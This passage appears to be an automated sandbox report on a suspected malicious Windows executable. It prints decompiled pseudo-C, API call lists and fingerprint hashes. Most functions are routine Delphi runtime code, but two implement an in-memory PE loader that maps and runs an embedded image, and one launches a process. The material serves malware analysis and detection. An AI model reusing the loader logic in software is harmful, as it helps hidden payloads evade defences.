                                                                				_v352 = 0;
                                                                				_v356 = 0;
                                                                				_t86 = __ecx;
                                                                				_t88 = __edx;
                                                                				_t67 = __eax;
                                                                				_push(_t91);
                                                                				_push(0x2525888);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t91 + 0xfffffe94;
                                                                				_push(0x25258a0);
                                                                				E02514B04( &_v352, __eax, __eflags);
                                                                				_push(_v352);
                                                                				_push(0x25258ac);
                                                                				E02514B04( &_v356, _t88, __eflags);
                                                                				_push(_v356);
                                                                				E02514C24();
                                                                				E02514B3C( &_v344, 0xff, _v348);
                                                                				E02513518( &_v72, 0x44);
                                                                				_v72.cb = 0x44;
                                                                				_v72.dwFlags = 1;
                                                                				_v72.wShowWindow = _t86;
                                                                				E02514B04( &_v364, _t67, _t93);
                                                                				E025181AC(_v364,  &_v360);
                                                                				_t49 = E02514D64(_v360);
                                                                				E02514B04( &_v368,  &_v344, _t93);
                                                                				_t54 = CreateProcessA(0, E02514D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
                                                                				asm("sbb eax, eax");
                                                                				if(_t54 + 1 != 0) {
                                                                					WaitForSingleObject(_v88.hProcess, 0xffffffff);
                                                                					CloseHandle(_v88);
                                                                					CloseHandle(_v88.hThread);
                                                                				}
                                                                				_pop(_t83);
                                                                				 *[fs:eax] = _t83;
                                                                				_push(E0252588F);
                                                                				return E025148C4( &_v368, 6);
                                                                			}


                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                • Opcode ID: db86f11c852da97ce3318ae4658e05f1ceb9ea3f34f58bc5ddeeeea76afa0d85
                                                                • Instruction ID: 3edb7ac687af855a89af7faccc499d8451c6434dbb75f249348c1a62db1aff2e
                                                                • Opcode Fuzzy Hash: db86f11c852da97ce3318ae4658e05f1ceb9ea3f34f58bc5ddeeeea76afa0d85
                                                                • Instruction Fuzzy Hash: 12315271A003599FEF20DF94CC81BDEB7B9FB89310F5041B5A508A7280DA759E89CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 63%
                                                                			E02513B00() {
                                                                				void* _v8;
                                                                				char _v12;
                                                                				int _v16;
                                                                				signed short _t14;
                                                                				intOrPtr _t27;
                                                                				void* _t29;
                                                                				void* _t31;
                                                                				intOrPtr _t32;
                                                                
                                                                				_t29 = _t31;
                                                                				_t32 = _t31 + 0xfffffff4;
                                                                				_v12 =  *0x252d024 & 0x0000ffff;
                                                                				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                					_t14 =  *0x252d024 & 0xffc0 | _v12 & 0x3f;
                                                                					 *0x252d024 = _t14;
                                                                					return _t14;
                                                                				} else {
                                                                					_push(_t29);
                                                                					_push(E02513B71);
                                                                					_push( *[fs:eax]);
                                                                					 *[fs:eax] = _t32;
                                                                					_v16 = 4;
                                                                					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                					_pop(_t27);
                                                                					 *[fs:eax] = _t27;
                                                                					_push(0x2513b78);
                                                                					return RegCloseKey(_v8);
                                                                				}
                                                                			}


                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02513B22
                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02513B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02513B55
                                                                • RegCloseKey.ADVAPI32(?,02513B78,00000000,?,00000004,00000000,02513B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02513B6B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                • API String ID: 3677997916-4173385793
                                                                • Opcode ID: e17e801cb2c97ebd2502ea447fed7950e0d0debd6ef11bcb6bf0849e25d4cfc7
                                                                • Instruction ID: 7419c551da6aebe71eef179d3b912f3076a910b4d4a3db9c38fbdf29678a555a
                                                                • Opcode Fuzzy Hash: e17e801cb2c97ebd2502ea447fed7950e0d0debd6ef11bcb6bf0849e25d4cfc7
                                                                • Instruction Fuzzy Hash: 72019E75940318BAFB11EBA1CC52BB97BF8EB49B00F5044E1BA04E65C0F674AA14DB5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 67%
                                                                			E02524F34(intOrPtr __eax, void* __ebx, void* __ecx, long __edi, void* __esi, void* __fp0) {
                                                                				void* _v8;
                                                                				intOrPtr _v12;
                                                                				char _v16;
                                                                				void* _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				void* _v40;
                                                                				signed int _v44;
                                                                				long _v48;
                                                                				char _v52;
                                                                				void* _t136;
                                                                				void* _t149;
                                                                				signed int _t186;
                                                                				signed int _t187;
                                                                				intOrPtr _t198;
                                                                				intOrPtr _t204;
                                                                				intOrPtr _t205;
                                                                				signed int _t211;
                                                                				signed int _t212;
                                                                				void* _t215;
                                                                				void* _t218;
                                                                				intOrPtr* _t219;
                                                                
                                                                				_t210 = __edi;
                                                                				_t185 = __ebx;
                                                                				_t217 = _t218;
                                                                				_t219 = _t218 + 0xffffffd0;
                                                                				_push(__ebx);
                                                                				_push(__edi);
                                                                				_v32 = __eax;
                                                                				_t198 =  *0x2524ba8; // 0x2524bac
                                                                				E025152D4( &_v16, _t198);
                                                                				_push(_t218);
                                                                				_push(0x2525141);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t219;
                                                                				_push(0);
                                                                				_push(_v32);
                                                                				asm("cdq");
                                                                				asm("adc edx, [esp+0x4]");
                                                                				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) +  *_t219;
                                                                				_v20 = VirtualAlloc(0,  *(_v24 + 0x50), 0x2000, 1);
                                                                				_v28 = _v20 -  *((intOrPtr*)(_v24 + 0x34));
                                                                				_v40 = VirtualAlloc(_v20,  *(_v24 + 0x54), 0x1000, 4);
                                                                				E02512DC8(_v32, __ebx,  *(_v24 + 0x54), _v40);
                                                                				VirtualProtect(_v40,  *(_v24 + 0x54), 2,  &_v48);
                                                                				_t215 = _v24 + 0x18 + ( *(_v24 + 0x14) & 0x0000ffff);
                                                                				_t136 = ( *(_v24 + 6) & 0x0000ffff) - 1;
                                                                				if(_t136 >= 0) {
                                                                					_v52 = _t136 + 1;
                                                                					_t187 = 0;
                                                                					do {
                                                                						_t210 =  *(_t215 + 8 + (_t187 + _t187 * 4) * 8);
                                                                						_v44 =  *((intOrPtr*)(_t215 + 0x10 + (_t187 + _t187 * 4) * 8));
                                                                						if(_t210 < _v44) {
                                                                							_t212 = _t210 ^ _v44;
                                                                							_v44 = _v44 ^ _t212;
                                                                							_t210 = _t212 ^ _v44;
                                                                						}
                                                                						_v40 = VirtualAlloc( *((intOrPtr*)(_t215 + 0xc + (_t187 + _t187 * 4) * 8)) + _v20, _t210, 0x1000, 4);
                                                                						E02513518(_v40, _t210);
                                                                						E02512DC8( *((intOrPtr*)(_t215 + 0x14 + (_t187 + _t187 * 4) * 8)) + _v32, _t187, _v44, _v40);
                                                                						_t187 = _t187 + 1;
                                                                						_t65 =  &_v52;
                                                                						 *_t65 = _v52 - 1;
                                                                					} while ( *_t65 != 0);
                                                                				}
                                                                				_v12 =  *((intOrPtr*)(_v24 + 0x28)) + _v20;
                                                                				_v16 = _v20;
                                                                				_push(0);
                                                                				E02515A04();
                                                                				_t144 =  *((intOrPtr*)(_v24 + 0xa0));
                                                                				if( *((intOrPtr*)(_v24 + 0xa0)) != 0) {
                                                                					E02524D68(_t144 + _v20, _t217);
                                                                				}
                                                                				_t146 =  *((intOrPtr*)(_v24 + 0x80));
                                                                				if( *((intOrPtr*)(_v24 + 0x80)) != 0) {
                                                                					E02524DE8(_t146 + _v20, _t185, _t210, _t215, _t217);
                                                                				}
                                                                				_t149 = ( *(_v24 + 6) & 0x0000ffff) - 1;
                                                                				if(_t149 >= 0) {
                                                                					_v52 = _t149 + 1;
                                                                					_t186 = 0;
                                                                					do {
                                                                						_t211 = _t186 + _t186 * 4;
                                                                						VirtualProtect( *((intOrPtr*)(_t215 + 0xc + _t211 * 8)) + _v20,  *(_t215 + 8 + _t211 * 8), E02524D20( *((intOrPtr*)(_t215 + 0x24 + _t211 * 8))),  &_v48);
                                                                						_t186 = _t186 + 1;
                                                                						_t96 =  &_v52;
                                                                						 *_t96 = _v52 - 1;
                                                                					} while ( *_t96 != 0);
                                                                				}
                                                                				if(_v12 != 0) {
                                                                					_push(0);
                                                                					_push(1);
                                                                					_push(_v20);
                                                                					if(_v12() == 0) {
                                                                						_v12 = 0;
                                                                					}
                                                                				}
                                                                				_t151 =  *((intOrPtr*)(_v24 + 0x78));
                                                                				if( *((intOrPtr*)(_v24 + 0x78)) != 0) {
                                                                					E02524D38(_t151 + _v20,  *((intOrPtr*)(_v24 + 0x7c)), _t217);
                                                                				}
                                                                				_pop(_t204);
                                                                				 *[fs:eax] = _t204;
                                                                				_push(E02525148);
                                                                				_t205 =  *0x2524ba8; // 0x2524bac
                                                                				return E02515398( &_v16, _t205);
                                                                 			}

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02524F87
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FAD
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FD7
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0252502F
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 025250E6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                 • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$Protect
                                                                • String ID:
                                                                • API String ID: 655996629-0
                                                                • Opcode ID: 50de9932c97f766967accdd06d3ce4162e492389bfafa335b961e9094137b725
                                                                • Instruction ID: 1c868ed8f465b16307f4452b3254a1bd5168e1992fb0192f82bc68b2a7af46a0
                                                                • Opcode Fuzzy Hash: 50de9932c97f766967accdd06d3ce4162e492389bfafa335b961e9094137b725
                                                                • Instruction Fuzzy Hash: 21711475A0021A9FDB14DFA8C880EAEB7F9FF88300F554465E940EB295E730E945CB68
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			E025243F8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				void* _v16;
                                                                				void* _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				long _v32;
                                                                				char _v36;
                                                                				intOrPtr _v40;
                                                                				intOrPtr _v44;
                                                                				void* _v48;
                                                                				signed int _v52;
                                                                				long _v56;
                                                                				char _v60;
                                                                				void* _t134;
                                                                				void* _t150;
                                                                				signed int _t183;
                                                                				signed int _t184;
                                                                				intOrPtr _t188;
                                                                				intOrPtr _t196;
                                                                				intOrPtr _t200;
                                                                				intOrPtr _t202;
                                                                				intOrPtr _t203;
                                                                				signed int _t207;
                                                                				signed int _t208;
                                                                				void* _t211;
                                                                				void* _t214;
                                                                
                                                                				_t206 = __edi;
                                                                				_t213 = _t214;
                                                                				_push(__edi);
                                                                				_v44 = __ecx;
                                                                				_t182 = __edx;
                                                                				_v40 = __eax;
                                                                				_t196 =  *0x2523864; // 0x2523868
                                                                				E025152D4( &_v36, _t196);
                                                                				_push(_t214);
                                                                				_push(0x25245e6);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t214 + 0xffffffc8;
                                                                				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) + _v44;
                                                                				_v16 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1);
                                                                				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
                                                                				_v48 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4);
                                                                				E02512DC8(_v44, _t182,  *(_v8 + 0x54), _v48);
                                                                				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56);
                                                                				_t211 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
                                                                				_t134 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                                                				if(_t134 >= 0) {
                                                                					_v60 = _t134 + 1;
                                                                					_t184 = 0;
                                                                					do {
                                                                						_t206 =  *(_t211 + 8 + (_t184 + _t184 * 4) * 8);
                                                                						_v52 =  *((intOrPtr*)(_t211 + 0x10 + (_t184 + _t184 * 4) * 8));
                                                                						if(_t206 < _v52) {
                                                                							_t208 = _t206 ^ _v52;
                                                                							_v52 = _v52 ^ _t208;
                                                                							_t206 = _t208 ^ _v52;
                                                                						}
                                                                						_v48 = VirtualAlloc( *((intOrPtr*)(_t211 + 0xc + (_t184 + _t184 * 4) * 8)) + _v16, _t206, 0x1000, 4);
                                                                						E02513518(_v48, _t206);
                                                                						E02512DC8( *((intOrPtr*)(_t211 + 0x14 + (_t184 + _t184 * 4) * 8)) + _v44, _t184, _v52, _v48);
                                                                						_t184 = _t184 + 1;
                                                                						_t66 =  &_v60;
                                                                						 *_t66 = _v60 - 1;
                                                                					} while ( *_t66 != 0);
                                                                				}
                                                                				_v24 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
                                                                				_v28 = _v24;
                                                                				_v36 = _v16;
                                                                				_v32 =  *(_v8 + 0x50);
                                                                				_push(0);
                                                                				_t200 =  *0x2523828; // 0x252382c
                                                                				E02515A04();
                                                                				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
                                                                				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
                                                                					E0252421C(_t145 + _v16, _t213);
                                                                				}
                                                                				_t147 =  *((intOrPtr*)(_v8 + 0x80));
                                                                				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
                                                                					E0252429C(_t147 + _v16, _t182, _t206, _t211, _t213);
                                                                				}
                                                                				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                                                				if(_t150 >= 0) {
                                                                					_v60 = _t150 + 1;
                                                                					_t183 = 0;
                                                                					do {
                                                                						_t207 = _t183 + _t183 * 4;
                                                                						VirtualProtect( *((intOrPtr*)(_t211 + 0xc + _t207 * 8)) + _v16,  *(_t211 + 8 + _t207 * 8), E025239F4( *((intOrPtr*)(_t211 + 0x24 + _t207 * 8)), _t200),  &_v56);
                                                                						_t183 = _t183 + 1;
                                                                						_t102 =  &_v60;
                                                                						 *_t102 = _v60 - 1;
                                                                					} while ( *_t102 != 0);
                                                                				}
                                                                				_t188 =  *0x2523864; // 0x2523868
                                                                				E025155FC(_a4, _t188,  &_v36);
                                                                				_pop(_t202);
                                                                				 *[fs:eax] = _t202;
                                                                				_push(E025245ED);
                                                                				_t203 =  *0x2523864; // 0x2523868
                                                                				return E02515398( &_v36, _t203);
                                                                 			}

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000001,00000000,025245E6,?,0255D33C,?,0256D338), ref: 02524440
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001,00000000,025245E6,?,0255D33C,?,0256D338), ref: 02524466
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001,00000000,025245E6,?,0255D33C), ref: 02524490
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 025244E8
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,0256D338), ref: 025245AE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                 • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$Protect
                                                                • String ID:
                                                                • API String ID: 655996629-0
                                                                • Opcode ID: 1e75a396e864f5c5ee54b0d9a2cb5bdf80d135c8998e1fe63ae6ca1c8e6f0888
                                                                • Instruction ID: 61c7695cc88b4832e47a899cb705389f48df174c335f5d6e0ce21ce22d6abe14
                                                                • Opcode Fuzzy Hash: 1e75a396e864f5c5ee54b0d9a2cb5bdf80d135c8998e1fe63ae6ca1c8e6f0888
                                                                • Instruction Fuzzy Hash: E671CF75A00219AFDB10DFA9D980AAEB7F9FF48310F1544A5E944EB295D630EE04CF64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 64%
                                                                			E0251AC5C(void* __esi, void* __eflags) {
                                                                				char _v8;
                                                                				intOrPtr* _t18;
                                                                				intOrPtr _t26;
                                                                				void* _t27;
                                                                				long _t29;
                                                                				intOrPtr _t32;
                                                                				void* _t33;
                                                                
                                                                				_t33 = __eflags;
                                                                				_push(0);
                                                                				_push(_t32);
                                                                				_push(0x251acf3);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t32;
                                                                				E0251A9D0(GetThreadLocale(), 0x251ad08, 0x100b,  &_v8);
                                                                				_t29 = E02517DDC(0x251ad08, 1, _t33);
                                                                				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                					EnumCalendarInfoA(E0251ABA8, GetThreadLocale(), _t29, 4);
                                                                					_t27 = 7;
                                                                					_t18 = 0x256c8f0;
                                                                					do {
                                                                						 *_t18 = 0xffffffff;
                                                                						_t18 = _t18 + 4;
                                                                						_t27 = _t27 - 1;
                                                                					} while (_t27 != 0);
                                                                					EnumCalendarInfoA(E0251ABE4, GetThreadLocale(), _t29, 3);
                                                                				}
                                                                				_pop(_t26);
                                                                				 *[fs:eax] = _t26;
                                                                				_push(E0251ACFA);
                                                                				return E025148A0( &_v8);
                                                                 			}

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0251ACF3,?,?,00000000), ref: 0251AC74
                                                                  • Part of subcall function 0251A9D0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0251ACF3,?,?,00000000), ref: 0251ACA4
                                                                • EnumCalendarInfoA.KERNEL32(Function_0000ABA8,00000000,00000000,00000004), ref: 0251ACAF
                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0251ACF3,?,?,00000000), ref: 0251ACCD
                                                                • EnumCalendarInfoA.KERNEL32(Function_0000ABE4,00000000,00000000,00000003), ref: 0251ACD8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                • String ID:
                                                                • API String ID: 4102113445-0
                                                                • Opcode ID: 22b6483d715c2940c6f5542eacb17c26c1cfa2260e80e0d7b9254c402b4c5a46
                                                                • Instruction ID: d33b80311cfde1d780af3c5992d6e6f7606a56b474ada1686920775b1df01f00
                                                                • Opcode Fuzzy Hash: 22b6483d715c2940c6f5542eacb17c26c1cfa2260e80e0d7b9254c402b4c5a46
                                                                • Instruction Fuzzy Hash: 7E0126756016497FF203B774CD02F6F769EFB85724F600120F801A66C4DA689E01CAAC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 81%
                                                                			E0251AD0C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				intOrPtr _v8;
                                                                				char _v12;
                                                                				intOrPtr _v16;
                                                                				char _v20;
                                                                				char _v24;
                                                                				void* _t45;
                                                                				void* _t47;
                                                                				void* _t49;
                                                                				void* _t51;
                                                                				intOrPtr _t75;
                                                                				void* _t76;
                                                                				void* _t77;
                                                                				void* _t83;
                                                                				void* _t92;
                                                                				intOrPtr _t111;
                                                                				void* _t122;
                                                                				void* _t124;
                                                                				intOrPtr _t127;
                                                                				void* _t128;
                                                                
                                                                				_t128 = __eflags;
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_t122 = __edx;
                                                                				_t124 = __eax;
                                                                				_push(_t127);
                                                                				_push(0x251aedc);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t127;
                                                                				_t92 = 1;
                                                                				E025148A0(__edx);
                                                                				E0251A9D0(GetThreadLocale(), 0x251aef4, 0x1009,  &_v12);
                                                                				if(E02517DDC(0x251aef4, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                					while(1) {
                                                                						__eflags = _t92 - E02514B60(_t124);
                                                                						if(__eflags > 0) {
                                                                							goto L28;
                                                                						}
                                                                						asm("bt [0x252d82c], eax");
                                                                						if(__eflags >= 0) {
                                                                							_t45 = E02518340(_t124 + _t92 - 1, 2, 0x251aef8);
                                                                							__eflags = _t45;
                                                                							if(_t45 != 0) {
                                                                								_t47 = E02518340(_t124 + _t92 - 1, 4, 0x251af08);
                                                                								__eflags = _t47;
                                                                								if(_t47 != 0) {
                                                                									_t49 = E02518340(_t124 + _t92 - 1, 2, 0x251af20);
                                                                									__eflags = _t49;
                                                                									if(_t49 != 0) {
                                                                										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
                                                                										__eflags = _t51;
                                                                										if(_t51 == 0) {
                                                                											L24:
                                                                											E02514B6C(_t122, 0x251af38);
                                                                										} else {
                                                                											__eflags = _t51 != 0x20;
                                                                											if(_t51 != 0x20) {
                                                                												E02514A88();
                                                                												E02514B6C(_t122, _v24);
                                                                											} else {
                                                                												goto L24;
                                                                											}
                                                                										}
                                                                									} else {
                                                                										E02514B6C(_t122, 0x251af2c);
                                                                										_t92 = _t92 + 1;
                                                                									}
                                                                								} else {
                                                                									E02514B6C(_t122, 0x251af18);
                                                                									_t92 = _t92 + 3;
                                                                								}
                                                                							} else {
                                                                								E02514B6C(_t122, 0x251af04);
                                                                								_t92 = _t92 + 1;
                                                                							}
                                                                							_t92 = _t92 + 1;
                                                                							__eflags = _t92;
                                                                						} else {
                                                                							_v8 = E0251BCA8(_t124, _t92);
                                                                							E02514DC4(_t124, _v8, _t92,  &_v20);
                                                                							E02514B6C(_t122, _v20);
                                                                							_t92 = _t92 + _v8;
                                                                						}
                                                                					}
                                                                				} else {
                                                                					_t75 =  *0x256c8c8; // 0x9
                                                                					_t76 = _t75 - 4;
                                                                					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                						_t77 = 1;
                                                                					} else {
                                                                						_t77 = 0;
                                                                					}
                                                                					if(_t77 == 0) {
                                                                						E025148F4(_t122, _t124);
                                                                					} else {
                                                                						while(_t92 <= E02514B60(_t124)) {
                                                                							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
                                                                							__eflags = _t83;
                                                                							if(_t83 != 0) {
                                                                								__eflags = _t83 != 0x20;
                                                                								if(_t83 != 0x20) {
                                                                									E02514A88();
                                                                									E02514B6C(_t122, _v16);
                                                                								}
                                                                							}
                                                                							_t92 = _t92 + 1;
                                                                							__eflags = _t92;
                                                                						}
                                                                					}
                                                                				}
                                                                				L28:
                                                                				_pop(_t111);
                                                                				 *[fs:eax] = _t111;
                                                                				_push(E0251AEE3);
                                                                				return E025148C4( &_v24, 4);
                                                                			}

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0251AEDC,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0251AD3B
                                                                  • Part of subcall function 0251A9D0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Locale$InfoThread
                                                                • String ID: eeee$ggg$yyyy
                                                                • API String ID: 4232894706-1253427255
                                                                • Opcode ID: 88a4aae3b296346a71fff721e885c762f8d46c89103a9527b45b14df04a1d4c8
                                                                • Instruction ID: b9a049a8e01fb94e1733787926ea23572d45258abc0275caa0e78a248e18c1d0
                                                                • Opcode Fuzzy Hash: 88a4aae3b296346a71fff721e885c762f8d46c89103a9527b45b14df04a1d4c8
                                                                • Instruction Fuzzy Hash: CA41F2757016064BFB13AAB8C8942BEB6EBFBC5300B544A26D4D1C7348DA34DD06CA6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251C608() {
                                                                				_Unknown_base(*)()* _t1;
                                                                				struct HINSTANCE__* _t3;
                                                                
                                                                				_t1 = GetModuleHandleA("kernel32.dll");
                                                                				_t3 = _t1;
                                                                				if(_t3 != 0) {
                                                                					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                					 *0x252d850 = _t1;
                                                                				}
                                                                				if( *0x252d850 == 0) {
                                                                					 *0x252d850 = E02518254;
                                                                					return E02518254;
                                                                				}
                                                                				return _t1;
                                                                			}

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0252C10B,00000000,0252C11E), ref: 0251C60E
                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0251C61F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                • API String ID: 1646373207-3712701948
                                                                • Opcode ID: 2438caa8d3243b88ff90eb033844d2a762197518090e3a77eacc0405be627b9f
                                                                • Instruction ID: d1541996c1fbaf96262189df03a0abf201e2a014f739d96eb1ba7c021e4a6256
                                                                • Opcode Fuzzy Hash: 2438caa8d3243b88ff90eb033844d2a762197518090e3a77eacc0405be627b9f
